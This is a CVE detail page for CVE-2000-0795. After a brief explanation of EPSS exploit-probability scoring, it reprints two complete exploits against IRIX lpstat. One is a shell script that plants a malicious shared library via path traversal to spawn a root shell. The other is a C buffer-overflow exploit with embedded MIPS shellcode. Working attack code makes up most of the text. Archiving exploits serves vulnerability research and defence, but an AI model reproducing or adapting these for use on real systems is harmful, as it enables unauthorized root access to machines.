CVE-2000-0795 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/bin/sh ## copyright LAST STAGE OF DELIRIUM jul 2000 poland *://lsd-pl.net/ # ## /usr/bin/lpstat # EXECUTABLE=/usr/bin/lpstat FILE=file LIBRARY=lsd DIRECTORY=tmp cd $DIRECTORY cat > $FILE << 'EOF' HOSTNAME=localhost HOSTPRINTER=bzzz-z EOF echo NETTYPE=../../../../$DIRECTORY/lsd >> $FILE chmod 666 $FILE cat > $LIBRARY.c << 'EOF' OpenConn(){ printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/\n"); printf("/usr/bin/lpstat for irix 5.3 6.2 6.3 6.4 6.5 6.5.11 IP:all\n"); printf("\n"); setreuid(getuid(),0);setuid(0);setgid(0); execl("/bin/sh","sh",0); } CloseConn(){} ListPrinters(){} SendJob(){} CancelJob(){} WaitForJob(){} GetQueue(){} StartTagging(){} StopTagging(){} Install(){} AddTimeout(){} RemoveSemiColons(){} CreateInterface(){} InstallPrinter(){} InstallIcon(){} SockRead(){} IsDest(){} BSDSendJob(){} ListAllPrinters(){} EOF cc -c $LIBRARY.c -c -o $LIBRARY.o ld -shared $LIBRARY.o -o $LIBRARY.so rm -rf $LIBRARY.[co] so_locations if [ ! -f "$LIBRARY.so" ] then echo "error: building library" exit 1 fi chmod 666 $LIBRARY.so $EXECUTABLE -n ../../../../../$DIRECTORY/$FILE # milw0rm.com [2001-05-07]

/* source: https://www.securityfocus.com/bid/1529/info Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise. */ /*## copyright LAST STAGE OF DELIRIUM nov 1998 poland *://lsd-pl.net/ #*/ /*## /bin/lpstat #*/ #define NOPNUM 468 #define ADRNUM 300 #define PCHNUM 300 char setreuidcode[]= "\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */ "\x24\x02\x04\x01" /* li $v0,1024+1 */ "\x20\x42\xff\xff" /* addi $v0,$v0,-1 */ "\x03\xff\xff\xcc" /* syscall */ "\x30\x44\xff\xff" /* andi $a0,$v0,0xffff */ "\x31\x65\xff\xff" /* andi $a1,$t3,0xffff */ "\x24\x02\x04\x64" /* li $v0,1124 */ "\x03\xff\xff\xcc" /* syscall */ ; char shellcode[]= "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ "\x24\x02\x03\xf3" /* li $v0,1011 */ "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ "\x03\xff\xff\xcc" /* syscall */ "/bin/sh" ; char jump[]= "\x03\xa0\x10\x25" /* move $v0,$sp */ "\x03\xe0\x00\x08" /* jr $ra */ ; char nop[]="\x24\x0f\x12\x34"; main(int argc,char **argv){ char buffer[10000],adr[4],pch[4],*b; int i; printf("copyright LAST STAGE OF DELIRIUM nov 1998 poland //lsd-pl.net/\n"); printf("/bin/lpstat for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n"); *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8888+1364+140-15012; *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8888+140+544+32748; b=buffer; *b++=0xff; for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i]; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; *b=0; execl("/bin/lpstat","lsd","-n",buffer,0); }